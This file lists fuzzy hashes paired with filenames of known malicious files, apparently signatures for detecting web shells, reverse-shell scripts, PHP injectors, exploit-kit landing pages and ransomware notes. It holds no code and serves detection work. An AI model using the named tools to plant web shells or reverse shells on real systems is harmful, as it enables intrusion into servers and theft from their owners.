+24:ZfeV4z54oMmRt2L1uav+QvsLeVMsv+dhgO1LVMsv+UgO1wJNRvc+8y4SJo:ZGVFoa1ueVIysVIvzR34SC,"404.php.~168~"
+24:ZfeV4z54oMmRt2L1uav+QvsLeVMsv+dhgO1DJNRvc+8y4SJo:ZGVFoa1ueVIyMzR34SC,"404.php.~167~"
+24:ZETw8AW7/icCiDysmJpkiw+d1ZUJ+ouiRix5J+zjuizANB0ukiCSAvyhWcQJQdu6:Ziwb+KwIpk101ZzAox6zjzIDZqvyhFF,"go-shell.pl"
+24:ZB+spof/rMo0uu5efvM1M1oU44R5GzaKFk+mbg7LAdRKHaSkGMxx8ghNyWG:ZAsyf/4o035efF1ox4RYzaKFk+mEvAdW,"hijack.php"
+24:yyW8FNT1eq/5aEu2A+qUobxurOQ4h54w5H4vV85N1aXMHzAwJxE:PWa5eqzu37b0oj5HqCb1k+Ji,"2016-02-23-Rig-EK-chain-step-2-xb.mylifeisnerdy.com-vjiviewforumyrjy.php.txt"
+24:yyseT+ggp0WYn1ETDPV66TFc5JtjirY4pUxYZU/A:PsWgp0WUE1Lwt2La/A,"2016-02-07-sc.gandhiprobably.com-qjfsviewforummyl.php.txt"
+24:yypQ2HFgUOfjS9JvoOZegfX8090nPSqQYkd9lqUsWltOoXYyS1sv:PK2DkjS9JgOZegE0unRUdHlsW/x61sv,"2016-02-23-Rig-EK-chain-step-2- xb.mylifeisnerdy.com-oxviewforumzkv.php.txt"
+24:yyGCYJFOVtnWImfq1Z0z0t/n/475T5P9GV5830xRO0KhMRkCOsFls:PGCYJgvnyfQEwngtT5P9kHxR7uiE,"2016-02-23-Rig-EK-chain-step-2-xb.mylifeisnerdy.com-ulmcviewforumqz.php.txt"
+24:yyg40uKuGC9irYARBt2THkPi578QihEzwhrzD:P+uKg4l07kg78bE6rzD,"2016-02-23-Rig-EK-chain-step-2-xb.mylifeisnerdy.com-mjixviewforumeamm.php.txt"
+24:yy6frrwOWpT9Kqrl3KzGqZTAZKPEESlSUIzKwy:P6frrDW99N3KzVZTMKPEnlD,"2016-06-02-a.topgunn.photography-pnhviewforumrembo.php.txt"
+24:yy6E1BIciyZfUWfxBP1eeuV8JDUyQVDz41OWp9NIU6b1:PvnrfUea85UGOWpbXI1,"2016-02-23-Rig-EK-chain-step-2-xb.mylifeisnerdy.com-cozbviewforummejvz.php.txt"
+24:yrg+12EUahDkgXg9f8bLTtIBkCFnHn99DM+LAjg/Z+LA9SK0523OkU+L:V+1292YgX1LToH9Wq/ZqkK+L,"StringToBase64.ps1"
+24:YRa9MoJjzT2nKCxTKgKbt2mK6gAeU52wIssOOlQHTMfApf/XDYa3:YN4qK+KgKbMGgAeUEwIssOwQQsXXEa3,"InjectorThimThumb.php"
+24:YRa9md4MhFpdNsEZoOu0Ih66/dcFyFdlhKEENslidOEgQmIjp/+KVfLM2szKRX4Q:YFdlvNC2cdcFyFMHQQXpDfoDfTw,"budak.php"
+24:yK0uCGhGjm8TRQzuFtFgEyNYKloMBRjXyWyXOXsqIN27Kmv:f0yhGvuuzgNIMBlCWy+Xo27rv,"VirusShare_d244153aeacb7321cb6b660b56a467dc"
+24:Yc9/D5GKS9RWpYr9BbFPCEvSGJZRL9xCtqzZ9MoFgzEeJZRWKD:P/4KWWpe1ZvSGJZjk0vTVeJZcKD,"example-css.css"
+24:ybXM7VM7tnRnMkMiNaA9hB6khLQ1+k2TO9x8Ap2:NAPBfhPk2TO9x8P,"4af614bfdc1150b1e17ae2b0a38a84d0_php.txt"
+24:/yBdlmbkXfELOf8LXWttwRiV+TKpBJQNYQJb:/YULOfGXWtqRI++pBJSrb,"mal-jun3-3.txt"
+24:Y8/B4S/BJGmd3rA6dtrTyrMBQL4U+TCbs693NbzdCbS2bz9:tJr3r/dtrTyrMo+TCbs6JNbhCb/bh,"php_gzip.tpl"
+24:XuQjYuTt8T29wyqjm2Ze3jQp4ugETJDYIo3L:eQbo29Ei2s3cTD3g,"另类PHP一句话小马.md"
+24:XoHsHEDheghwJEFpIYM6ALbIUEPolEH80ZEVfpu7JWAjg3BsjClg2diWv1J:4HhDE+w2a2ANEPIEHqg1WNsjMdNJ,"Expdoor.com ASP专用小马.asp"
+24:xnekHIaQLmpHLJYZw4LzfIgwBqSStX/Xj30bt9q+TUlTxoLDivomYnU1bnUHw6zr:xe8IqZwwGsgCqSgXv7cqjzvoF++Ou,"jsp-reverse.jsp"
+24:XlfdfA7Ki8Mq6LiQDv1ZqJafBbqBRdF3He13MYuEeL28jAYflVhYIILkJ1yL:Xwhq6LiQD1eafBb4fHiMY188YlXIeyL,"8e207fc803bd40a535070b6b5ef8289b_php.txt.001.001.001.001.001.001.001.001"
+24:xKN3woU5SBwYchuK0bMKirECGgpUHvKmw+z4bn2eMm5j:iwo/BwDYHQKirE++Ubn2eD,"2016-07-14-other-Neutrino-EK-payload-Bandarchor-ransomware-decryption-instructions.txt"
+24:xKN3woU5SBwYchuK0bMKirECGgpUHvKmwYvuTg4bn2eMm5j:iwo/BwDYHQKirE+xTNbn2eD,"2016-07-18-other-Neutrino-EK-payload-Bandarchor-ransomware-decryption-instructions.txt"
+24:Xk2d5g042N68QSG0R2Xkk2d5g042N68QF:U2buU64R2XX2buU6T,"gif89a.jpg"
+24:xIz5yYayVvQgz524oFxz5oRPAkVsMyi5qpQTtnpxjtxFuUo0EnMAzpnMmXMzzpCA:uzIyFNzw4oFxz87xpPxFuUQnMAz5z8z1,"Liz0ziM_Priv8_cmd_by_Liz0ziM.php.txt"
+24:x3yaJQcMG4lvUBMnw0DcHXLRqdQcMG4lvuwI12OcMG4lvHcMG4lvuv:BJQvRaU3c30QvR8wIrvRFvRC,"mybase.md"
+24:WZvMFaMF0FF0tFFOwvLuzFFWMFZMFPyVZfqj:fvQiX18B+PGE,"LijHgs3.phps"
+24:WZrz1lLQjT3S+3xkslnasV6NbvmD2+7jFtQaBY4df0vn3K69aSyIptd:WZrhyv3is9asV6Zuqj4Zc3K69aM,"s.php"
+24:WZrz1lLQjT3S+3xkslnasV6Nbv1DNkc7jFtQa31K84df0vn3K69aSyIptd:WZrhyv3is9asV6ZdpEEec3K69aM,"vhost.php"
+24:WywteRwZVohg3AUs4WSHfrP+3hXW0wXNIYP4YUAQAum55NClSMYFApTm16bKd47E:KeCVag344WMIG0aNL4R6E19XvA,"2016-08-23-pseudoDarkleech-Neutrino-EK-landing-page.txt"
+24:WywteRwY3AU3RB/+PA9Ve3rqIYP4YUAQAum55NClSMYFApTm16bKd47jEOk:KeB33RebqL4R6E19XvA,"2016-07-29-EITest-Neutrino-EK-landing-page-after-nurseryrhymesdaycare.ca.txt"
+24:WywteRwXoN3AUxS90aDIpf901eyby1IYP4YUAQAum55NClSMYFApTm16bKd47jEn:KeV3ds04QV0+1L4R6E19XvA,"2016-07-29-EITest-Neutrino-EK-landing-page-after-carolinagodiva.org.txt"
+24:WywteRwU3AUlTrjZhIawEaWdp6+IYP4YUAQAum55NClSMYFApTm16bKd47jEOk:KeB39jX4EtdLL4R6E19XvA,"2016-07-28-pseudoDarkleech-Neutrino-EK-landing-page-second-run.txt"
+24:WywteRwrTLd3AUw7yMjsIR7y/A0NqTLitVIYP4YUAQAum55NClSMYFApTm16bKdH:KemZ3XTA0WaVL4R6E19XvA,"2016-08-05-EITest-Neutrino-EK-landing-page.txt"
+24:WywteRwri63AUVXoro+PHuoqidK6iQAIYP4YUAQAum55NClSMYFApTm16bKd47jA:KeX6392LuIdEJL4R6E19XvA,"2016-07-28-pseudoDarkleech-Neutrino-EK-landing-page-first-run.txt"
+24:WywteRwrg3AUHH+dPwhIDUmpvpdMgy2IYP4YUAQAum55NClSMYFApTm16bKd47jA:Kev3jH+dPsxmzdm2L4R6E19XvA,"2016-07-28-pseudoDarkleech-Neutrino-EK-landing-page-third-run.txt"
+24:WywteRwqdu3AUvDaUcOhILJC/v1tJIYP4YUAQAum55NClSMYFApTm16bKd47jEOk:KeRg3PaXWmJetHL4R6E19XvA,"2016-08-16-pseudoDarkleech-Neutrino-EK-landing-page-after-blenheim-lodge.com.txt"
+24:WywteRwP3AUvHtt1k2hImstt1+eH7t6IYP4YUAQAum55NClSMYFApTm16bKd47jA:Keu3Bzk+7KzfoL4R6E19XvA,"2016-08-01-pseudoDarkleech-Neutrino-EK-landing-page.txt"
+24:WywteRwLw13AU+76+PqZgPVIYP4YUAQAum55NClSMYFApTm16bKd47jEOk:KeCi3C7cyL4R6E19XvA,"2016-08-12-pseudoDarkleech-Neutrino-EK-landing-page-after-dakarvoice.com.txt"
+24:WywteRwKU3AUkZSf8+Pqh98gR8RyS/IYP4YUAQAum55NClSMYFApTm16bKd47jEn:Ke/U35fG6q8t/L4R6E19XvA,"2016-07-29-EITest-Neutrino-EK-landing-page-after-callkarl.ca.txt"
+24:WywteRwh3AUvsRZ2SId2RI8V2IYP4YUAQAum55NClSMYFApTm16bKd47jEOk:Ke03IR/b2C2L4R6E19XvA,"2016-07-29-EITest-Neutrino-EK-landing-page-after-redwood-inc.com.txt"
+24:WywteRwBG3AU5fwIWJyqtAV+IYP4YUAQAum55NClSMYFApTm16bKd47jEOk:Ke13+DJdxL4R6E19XvA,"2016-08-24-pseudoDarkleech-Neutrino-EK-landing-page.txt~"
+24:WywteRwAh3AU+b12GYPJbpvj2IYP4YUAQAum55NClSMYFApTm16bKd47jEOk:Ket3GNaaL4R6E19XvA,"2016-08-17-pseudoDarkleech-Neutrino-EK-landing-page.txt"
+24:WywteRw73hC3AUMuaqhIZ/EtPv2cDIYP4YUAQAum55NClSMYFApTm16bKd47jEOk:KeD3Qubv5TDL4R6E19XvA,"2016-08-18-Afraidgate-Neutrino-EK-landing-page.txt"
+24:WywteRw/3AUWTIaU6JW+PARtoaUtcIYP4YUAQAum55NClSMYFApTm16bKd47jEOk:KeG3oIadQ6amcL4R6E19XvA,"2016-08-18-pseudoDarkleech-Neutrino-EK-landing-page.txt"
+24:WywteRw2LI83AU2mSWPH58L80bkDqIYP4YUAQAum55NClSMYFApTm16bKd47jEOk:KeI83mC10OqL4R6E19XvA,"2016-08-16-pseudoDarkleech-Neutrino-EK-landing-page-after-convoyproperty.com.txt"
+24:WywteRw2k8of3AUV6pABYIHvpA5o5xJ6qoMIYP4YUAQAum55NClSMYFApTm16bKN:Ke+3R6Fqvb5WEL4R6E19XvA,"2016-08-11-EITest-Neutrino-EK-landing-page.txt"
+24:WysiUHGbsREN8uMRRZHPJ6RtRXu3AUvE2vw/MIHfvhK/q06GRoVUmxhocIy:TUuss8uMRXAr43YvMqBU6GsU6x,"2016-07-15-pseudoDarkleech-Neutrino-EK-landing-page.txt"
+24:WysiUHGbsREN8uMRRZHPJ6RtRnthh3AU5Hgvu/1tErRcyGRoVUmxhocIy:TUuss8uMRXArVh31Hg2SuyGsU6x,"2016-07-14-Afraidgate-Neutrino-EK-landing-page-example-1-of-4.txt"
+24:WysiUHGbsREN8uMRRZHPJ6RtRht7c3AU7aKVxxI7tphvvDCGRoVUmxhocIy:TUuss8uMRXArFc3naKx0FjCGsU6x,"2016-07-14-other-Neutrino-EK-landing-page.txt"
+24:WysiUHGbsREN8uMRRZHPJ6RtRDi3AUUYRQlIp6l/dtcYRbKGRoVUmxhocIy:TUuss8uMRXArE3NR8jBdvRbKGsU6x,"2016-07-15-other-Neutrino-EK-landing-page.txt"
+24:WysiUHGbsREN8uMRRZHPJ6RtRbTc3AUnQrOeu/LyrgtTe0+W2GRoVUmxhocIy:TUuss8uMRXArBc36Oqgxee2GsU6x,"2016-07-14-Afraidgate-Neutrino-EK-landing-page-example-4-of-4.txt"
+24:WysiUHGbsREN8uMRRZHPJ6RtRbTc3AUFeu/LPtTe0+W2GRoVUmxhocIy:TUuss8uMRXArBc3B1xee2GsU6x,"2016-07-14-Afraidgate-Neutrino-EK-landing-page-example-3-of-4.txt"
+24:WysiUHGbsREN8uMRRZHPJ6RtRbTc3AU1Oeu/LzgtTe0+W2GRoVUmxhocIy:TUuss8uMRXArBc3Yuxee2GsU6x,"2016-07-14-Afraidgate-Neutrino-EK-landing-page-example-2-of-4.txt"
+24:WyHuH2EJf1+Sn6uL+PRK4t07VhVd7ujvnA3AUlxYju/ABP55MWjc:ZwfjnfL57j7oA3hql58,"2016-07-13-pseudoDarkleech-Neutrino-EK-landing-page-first-run.txt"
+24:WyHuH2EJf1+Sn6uL+PRK4t07VhVd7ujvnA3AUlhs0ju/AB4V5MWjc:ZwfjnfL57j7oA3hh5e58,"2016-07-13-pseudoDarkleech-Neutrino-EK-landing-page-second-run.txt"
+24:WyHuH2EJf1+Sn6uL+PRK4t07VhVd7t/3AUXRhNmQIVZN0vDK:ZwfjnfL57j7B3lhNjWN0bK,"2016-07-13-other-Neutrino-EK-landing-page-second-run.txt"
+24:WyHuH2EJf1+Sn6uL+PRK4t07VhVd7jtKt363AULU/tFvXSl:ZwfjnfL57j70s33l,"2016-07-13-other-Neutrino-EK-landing-page-first-run.txt"
+24:WyHuH2EJf1+Sn6uL+PRK4t07VhVd7F3AUIH9n9Yu/ja3W55LVH9B:ZwfjnfL57j7F3MLfauLD,"2016-07-13-EITest-Neutrino-EK-landing-page.txt"
+24:WyHuH2EJf1+Sn6uL+PRK4t07VhVd7c+3AUrWXnFNau/AEJzXtkikaLX:ZwfjnfL57j7F3HWXnFN/ziiFj,"2016-07-11-Afraidgate-Neutrino-EK-landing-page.txt"
+24:WyHuH2EJf1+Sn6uL+PRK4t07VhVd7b3AUONt4Ah6YIyqXqxIV+JaIy9yb/tz:ZwfjnfL57j7b3Yirhfym+Jj7TB,"2016-07-11-other-Neutrino-EK-landing-page.txt"
+24:WyHuH2EJf1+Sn6uL+PRK4t07VhVd7+3AUjkV/N/53kJH9v:ZwfjnfL57j7+3MaJV,"2016-07-12-pseudoDarkleech-Neutrino-EK-landing-page.txt"
+24:Wy0ZdBCE2Bh+V4Cxo63AU1sh492evUtOyLveh4Is:ubZ6h143xf9WJLBv,"2016-07-01-pseudoDarkleech-Neutrino-EK-landing-page-second-example.txt"
+24:Wy0yK816bMksOVX9iok4dAg3AU+HZJLMs36evGUAXc59LMsxs:uyK26YAV84+g3S5JF3YD29F2,"2016-06-28-pseudoDarkleech-Neutrino-EK-landing-page-after-airbornehydrography.com.txt"
+24:Wy0U89o2HPnyR4noWwO3AUMoNVevQvVSD7BgVs:uU87voWwO344sD3,"2016-07-01-pseudoDarkleech-Neutrino-EK-landing-page-after-gennaroespositomilano.it.txt"
+24:Wy0pHCcE3ViVE4amX453AUF2Ly4BxYBIevvk2Ly4V0m5cz:uh1E3mN453BgBulEgVOz,"2016-02-12-Neutrino-EK-landing-page.txt"
+24:Wy0oH6eY4n33AUISKZ8NIBxyJDkPmvNKZas:uCVD33EwyAg,"2016-06-24-pseudoDarkleech-Neutrino-EK-landing-page-after-sunlait.com.txt"
+24:Wy0JDmnry1X4K9oY43AU1qwvev1tWvFwRks:uR6G1oo43xqw5wF,"2016-06-30-Afraidgate-Neutrino-EK-landing-page-after-marketingguerilla.es.txt"
+24:Wy0GlPmBvVMEXIVLN4ncg3AUVyNWpZNp1tZvhIC63LRg1tE3T+s:uaPmBNMEXELycg35XNp1tdhStg1tED1,"2016-06-30-psuedoDarkleech-Neutrino-EK-landing-page-after-austinbioidenticaldoctor.com.txt"
+24:Wy0GlPmBvVMEXIVLN4ncg3AUVyNWpZhLInpjvhIC63LRGLInpy3T+s:uaPmBNMEXELycg35XxIphStYIID1,"2016-06-30-psuedoDarkleech-Neutrino-EK-landing-page-after-chromechurch.com.txt"
+24:Wy0GlPmBvVMEXIVLN4ncg3AUVyNWpZFU1vhIC63LRo3T+s:uaPmBNMEXELycg35X2RhStoD1,"2016-06-30-psuedoDarkleech-Neutrino-EK-landing-page-after-alphamedical02.fr.txt"
+24:Wy0GlPmBvVMEXIVLN4ncg3AUVyNWpZFfvhIC63LR8u3T+s:uaPmBNMEXELycg35XFnhSt8uD1,"2016-06-30-EITest-Neutrino-EK-landing-page-after-pekabex.pl.txt"
+24:Wy0GlPmBvVMEXIVLN4ncg3AUVyNWpZB3IYvhIC63LRM3IB3T+s:uaPmBNMEXELycg35X5LhStiaD1,"2016-06-30-EITest-Neutrino-EK-landing-page-after-cliniqueh.dk.txt"
+24:Wy0GlPmBvVMEXIVLN4ncg3AUVyNWpZ3X5vhIC63LRCXk3T+s:uaPmBNMEXELycg35Xn9hStakD1,"2016-06-30-EITest-Neutrino-EK-landing-page-after-4county.org.txt"
+24:Wy0FUl6aD9i0ICEX4pMl3AUBjFIC8WKD6XYs:uFUbc3CRp63FFZZ,"2016-06-29-realstatistics-gate-Neutrino-EK-landing-page-after-nebularoficial.com.txt"
+24:Wy0Bx5+us4n3AUvIX5O2CXRvBO2R6Brcz:uv5+mn3z2J28az,"2016-05-19-EITest-Neutrino-EK-landing-page.txt"
+24:Wy07fInYK4PwM7W3AUERzI3mevNE6Ct7s0DKs:uDIWPw+W3QRcrKps0t,"2016-06-28-Neutrino-EK-landing-page-after-tonwyattwood.com.au.txt"
+24:Wy06O4P/c3AU59ST47Y2jZvjmWysf7YAZs:u6VPU318TcjyH,"2016-06-20-Afraidgate-Neutrino-EK-landing-page.txt"
+24:Wy05sU++4fA3AU8NMX29gXqIHTX29HDeJRtJcz:uCFY3wNMXKzqTXKjeJRYz,"2015-09-08-Neutrino-EK-landing-page.txt"
+24:Wy00nSXEE8BDIZ1O4a3AU2Q9FNDevIU6Ti5s:uwXjS1Va3p7TbJ,"2016-06-30-realstatistics-gate-Neutrino-EK-landing-page-after-lostreschiles.com.txt"
+24:wWunyCOjJ6ohjYlywFtbYbL27j7OsMS/DJ7q7nyrYfGkK:xcyCG6ohsYOYH27WsMS/DJ769i,"therules25.php"
+24:wWJgW4HPEd7m/+v2+gA+5GoXkabHm8px9LVgn7gjnh82nzc7gsqGmLIHGa7p:wogzHPY7mmv2tlDpx96n0hj4dFmL4GaN,"ASPX小马 - 黑兵社团.aspx"
+24:WUdNHIBIqkfz5fMiZfQaE00faqfQf1maI5fqfibfJO:/l0iZIa90Sq4tma+iCxO,"php读取iis.php"
+24:WSHYNHn/6GV5s2AbA1xMqNWuP8B0BOtXyiiLPNANfHeYhwiYWiZAgSpu2V463:Z0/6GX4ixZ0bXyiibNANfH8iomgSHq63,"sep16-6.txt"
+24:WS/BmRngYngkugXj64DJYxhOjmkKNCkn6O27yk27KKCiW5xAqfACr:+3NFMYjmkWCkn6O27yk27KkWxr,"elelele2.php"
+24:WomOMkn4k5UH8rWLhk5yoN2g2LS7Me+T7/3qzmchf2aKBsthjKhOK+8JWH3D8KDq:zmwScrnnESA5Tr3uRhf2aKBOhjKbJAG1,"supers.php"
+24:WngPZspZW9xUp/f9EexMTjMzYEFExP527MzYEFExDS:/ypkQF9uMzc3aMzc5S,"injektor.php.55"
+24:WngPZspZW9xUp/f9EexMTjMzsCRSTw527MzsCRSTiS:/ypkQF9uMzsCYTEaMzsCYTiS,"injektor.php.41"
+24:WngPZspZW9xUp/f9EexMTjMZ+P87qlVtLIl527MZ+P87qlVtLIJS:/ypkQF9uMAPhlVoaMAPhlVuS,"injektor.php.9"
+24:WngPZspZW9xUp/f9EexMTjMzonrxkq+0DEN+z1o527Mzonrxkq+0DEN+z1KS:/ypkQF9uMzCNLDY+Z8aMzCNLDY+ZKS,"injektor.php.48"
+24:WngPZspZW9xUp/f9EexMTjMyk3AuAXGGQN+U1o527Myk3AuAXGGQN+U1KS:/ypkQF9uMH3AdN6+08aMH3AdN6+0KS,"injektor.php.65"
+24:WngPZspZW9xUp/f9EexMTjMYbROkjdxcfP527MYbROkjdxcfDS:/ypkQF9uMY9OwcpaMY9OwcbS,"injektor.php.44"
+24:WngPZspZW9xUp/f9EexMTjMXXDLCxZP527MXXDLCxZDS:/ypkQF9uMXXDOxvaMXXDOxhS,"injektor.php.13"
+24:WngPZspZW9xUp/f9EexMTjMXa1ZTNdqmRfu7527MXa1ZTNdqmRfunS:/ypkQF9uMXSfddRWaMXSfddRsS,"injektor.php.23"
+24:WngPZspZW9xUp/f9EexMTjMwpK0zCey7+p1o527MwpK0zCey7+p1KS:/ypkQF9uMw4oZy7+r8aMw4oZy7+rKS,"injektor.php.51"
+24:WngPZspZW9xUp/f9EexMTjMVnmCSNAZ71rI+Ae527MVnmCSNAZ71rI+AAS:/ypkQF9uMVRm+vaMVRm+hS,"injektor.php.36"
+24:WngPZspZW9xUp/f9EexMTjMv9FNzGu527Mv9FNzGQS:/ypkQF9uMvNzGiaMvNzGQS,"injektor.php.30"
+24:WngPZspZW9xUp/f9EexMTjMv9eFuqjUq527Mv9eFuqjUkS:/ypkQF9uMvTOTaMvTONS,"injektor.php.64"
+24:WngPZspZW9xUp/f9EexMTjMUGByC+F1cP527MUGByC+F1cDS:/ypkQF9uMUGByRnwaMUGByRnGS,"injektor.php.61"
+24:WngPZspZW9xUp/f9EexMTjMtzqkrHGVQ6v0oKl527MtzqkrHGVQ6v0oKJS:/ypkQF9uMtzLK6E0haMtzLK6E0jS,"injektor.php.37"
+24:WngPZspZW9xUp/f9EexMTjMS+pic/mGgHrVDxJl527MS+pic/mGgHrVDxJJS:/ypkQF9uMVmzfZaMVmzfLS,"injektor.php.15"
+24:WngPZspZW9xUp/f9EexMTjMsOErnJ9mXrl527MsOErnJ9mXrJS:/ypkQF9uMsPnYaMsPneS,"injektor.php.53"
+24:WngPZspZW9xUp/f9EexMTjMs0H7OmxdlT+b1o527Ms0H7OmxdlT+b1KS:/ypkQF9uMs0bOufT+x8aMs0bOufT+xKS,"injektor.php.47"
+24:WngPZspZW9xUp/f9EexMTjMrwFy7foossxB1vWw527MrwFy7foossxB1vWiS:/ypkQF9uMrwOwoLB1eEaMrwOwoLB1eiS,"injektor.php.45"
+24:WngPZspZW9xUp/f9EexMTjMrM53ymGb1o527MrM53ymGb1KS:/ypkQF9uMrUif8aMrUifKS,"injektor.php.2"
+24:WngPZspZW9xUp/f9EexMTjMRj3tu50xPP527MRj3tu50xPDS:/ypkQF9uMRjnPaMRjnBS,"injektor.php.59"
+24:WngPZspZW9xUp/f9EexMTjMquIN+0pCTutl527MquIN+0pCTutJS:/ypkQF9uM4NaM4nS,"injektor.php.60"
+24:WngPZspZW9xUp/f9EexMTjMQIW1m9GXBQlk4o527MQIW1m9GXBQlk4KS:/ypkQF9uMsoK2l2aMsoK2lMS,"injektor.php.7"
+24:WngPZspZW9xUp/f9EexMTjMQcmk7iP527MQcmk7iDS:/ypkQF9uM9/2aM9/MS,"injektor.php.17"
+24:WngPZspZW9xUp/f9EexMTjMq0/UfshYzodaB+M1o527Mq0/UfshYzodaB+M1KS:/ypkQF9uMqLfTzx+88aMqLfTzx+8KS,"injektor.php.19"
+24:WngPZspZW9xUp/f9EexMTjMPU2CCro2oT7P527MPU2CCro2oT7DS:/ypkQF9uMPU2C/2oTNaMPU2C/2oTnS,"injektor.php.4"
+24:WngPZspZW9xUp/f9EexMTjMp2rGAW986+Y1o527Mp2rGAW986+Y1KS:/ypkQF9uMJAWG6+g8aMJAWG6+gKS,"injektor.php.24"
+24:WngPZspZW9xUp/f9EexMTjMOIW1DbP527MOIW1DbDS:/ypkQF9uMaRaMaTS,"injektor.php.1"
+24:WngPZspZW9xUp/f9EexMTjMohRnc3IBHL96+p1o527MohRnc3IBHL96+p1KS:/ypkQF9uMoh++r8aMoh++rKS,"injektor.php.46"
+24:WngPZspZW9xUp/f9EexMTjMo8C4v3WrS+/1o527Mo8C4v3WrS+/1KS:/ypkQF9uMoKmrS+98aMoKmrS+9KS,"injektor.php.3"
+24:WngPZspZW9xUp/f9EexMTjMO1c+Fw1P527MO1c+Fw1DS:/ypkQF9uMZ+aTaMZ+aNS,"injektor.php.26"
+24:WngPZspZW9xUp/f9EexMTjMNs3kRA7iiqeP527MNs3kRA7iiqeDS:/ypkQF9uMNu7iEaMNu7iiS,"injektor.php.14"
+24:WngPZspZW9xUp/f9EexMTjMN0LavP527MN0LavDS:/ypkQF9uMYa5aMYarS,"injektor.php.62"
+24:WngPZspZW9xUp/f9EexMTjMM+iTEJmgX91o527MM+iTEJmgX91KS:/ypkQF9uM7JjXH8aM7JjXHKS,"injektor.php.6"
+24:WngPZspZW9xUp/f9EexMTjMMebR21zAR1o527MMebR21zAR1KS:/ypkQF9uMMDho8aMMDhoKS,"injektor.php.56"
+24:WngPZspZW9xUp/f9EexMTjMlWguTWzKP527MlWguTWzKDS:/ypkQF9uMlWguCzKaMlWguCzoS,"injektor.php.11"
+24:WngPZspZW9xUp/f9EexMTjML6rTv2puw527ML6rTv2puiS:/ypkQF9uMLYTvVEaMLYTvViS,"injektor.php.10"
+24:WngPZspZW9xUp/f9EexMTjMl/16wQdhNdSdl527Ml/16wQdhNdSdJS:/ypkQF9uMl8wQnN4aMl8wQnN+S,"injektor.php.38"
+24:WngPZspZW9xUp/f9EexMTjMJyjctsHW8jLl527MJyjctsHW8jLJS:/ypkQF9uMeSOTaMeSONS,"injektor.php.20"
+24:WngPZspZW9xUp/f9EexMTjMjuiR+p32h67527MjuiR+p32h6nS:/ypkQF9uMaiwG4NaMaiwG4nS,"injektor.php.35"
+24:WngPZspZW9xUp/f9EexMTjMirY2TdjJyYP527MirY2TdjJyYDS:/ypkQF9uMGBNaMGBnS,"injektor.php.66"
+24:WngPZspZW9xUp/f9EexMTjMhujMyDvWZP527MhujMyDvWZDS:/ypkQF9uMh8MavWvaMh8MavWhS,"injektor.php.42"
+24:WngPZspZW9xUp/f9EexMTjMHOzHiDQQV+B527MHOzHiDQQV+tS:/ypkQF9uMz0QV+zaMz0QV+tS,"injektor.php.49"
+24:WngPZspZW9xUp/f9EexMTjMfJSKgIxe28SdvBl527MfJSKgIxe28SdvBJS:/ypkQF9uMfQKnZ8qZaMfQKnZ8qLS,"injektor.php.50"
+24:WngPZspZW9xUp/f9EexMTjMeJiRfub+ql527MeJiRfub+qJS:/ypkQF9uMeJBaMeJDS,"injektor.php.33"
+24:WngPZspZW9xUp/f9EexMTjMeeSp0PPNUj3HAzwr1o527MeeSp0PPNUj3HAzwr1KS:/ypkQF9uMwI63EE8aMwI63EEKS,"injektor.php.34"
+24:WngPZspZW9xUp/f9EexMTjMEagt1u2Csy2P527MEagt1u2Csy2DS:/ypkQF9uMED2TuaMED2T0S,"injektor.php.27"
+24:WngPZspZW9xUp/f9EexMTjMd+jLvDHxQK/+P3B51o527Md+jLvDHxQK/+P3B51KS:/ypkQF9uMdcLvDHd+578aMdcLvDHd+5R,"injektor.php.16"
+24:WngPZspZW9xUp/f9EexMTjMdhiF4miOKP527MdhiF4miOKDS:/ypkQF9uMdhlmiOKaMdhlmiOoS,"injektor.php.39"
+24:WngPZspZW9xUp/f9EexMTjMD0gTq7I93Ib+zj1o527MD0gTq7I93Ib+zj1KS:/ypkQF9uMIg+cFi+zJ8aMIg+cFi+zJKS,"injektor.php.31"
+24:WngPZspZW9xUp/f9EexMTjMcWtijzE1o527McWtijzE1KS:/ypkQF9uMck8aMckKS,"injektor.php.43"
+24:WngPZspZW9xUp/f9EexMTjMc6d6YtOw4f6ml527Mc6d6YtOw4f6mJS:/ypkQF9uMc6c01s7aMc6c01sFS,"injektor.php.25"
+24:WngPZspZW9xUp/f9EexMTjMBPYgUEPMP527MBPYgUEPMDS:/ypkQF9uMBAgUZaMBAgULS,"injektor.php.29"
+24:WngPZspZW9xUp/f9EexMTjMADXEBprPNqP527MADXEBprPNqDS:/ypkQF9uM5BppqaM5BppIS,"injektor.php.8"
+24:WngPZspZW9xUp/f9EexMTjM7ivL/0D4N+31o527M7ivL/0D4N+31KS:/ypkQF9uM7iv84N+F8aM7iv84N+FKS,"injektor.php.21"
+24:WngPZspZW9xUp/f9EexMTjM6NI24dOHUP527M6NI24dOHUDS:/ypkQF9uM6NI1o4aM6NI1o+S,"injektor.php.57"
+24:WngPZspZW9xUp/f9EexMTjM5VKdQdpi+Y1o527M5VKdQdpi+Y1KS:/ypkQF9uM5VKmi+g8aM5VKmi+gKS,"injektor.php.28"
+24:WngPZspZW9xUp/f9EexMTjM5sZ3kiMLmsMjl527M5sZ3kiMLmsMjJS:/ypkQF9uMU3mLNeaMU3mLNkS,"injektor.php.58"
+24:WngPZspZW9xUp/f9EexMTjM5LP527M5LDS:/ypkQF9uM/aMxS,"injektor.php.32"
+24:WngPZspZW9xUp/f9EexMTjM4jTbcNDXEfyl527M4jTbcNDXEfyJS:/ypkQF9uM4UjaM4UdS,"injektor.php.52"
+24:WngPZspZW9xUp/f9EexMTjM/4fAsSJBl527M/4fAsSJBJS:/ypkQF9uMUAbBaMUAbDS,"injektor.php.54"
+24:WngPZspZW9xUp/f9EexMTjM2qTIW1iYvxoB31F527M2qTIW1iYvxoB31pS:/ypkQF9uM2q3iYZo51naM2q3iYZo51pS,"injektor.php.18"
+24:WngPZspZW9xUp/f9EexMTjM2jnjo3+F1o527M2jnjo3+F1KS:/ypkQF9uMUjO+f8aMUjO+fKS,"injektor.php.22"
+24:WngPZspZW9xUp/f9EexMTjM25Otc1Uu1scpmE/P527M25Otc1Uu1scpmE/DS:/ypkQF9uM25Otc1UuRJaM25Otc1UuR7S,"injektor.php.5"
+24:WngPZspZW9xUp/f9EexMTjM1NgvD0vdMAP527M1NgvD0vdMADS:/ypkQF9uMuWuMaMuWuaS,"injektor.php"
+24:WngPZspZW9xUp/f9EexMTjM0ZBrmH8Sl527M0ZBrmH8SJS:/ypkQF9uMUBKZaMUBKLS,"injektor.php.40"
+24:WngPZspZW9xUp/f9EexMTjM0P5oEVvXflG8jtLRl527M0P5oEVvXflG8jtLRJS:/ypkQF9uMuooflG8jfaMuooflG8jRS,"injektor.php.63"
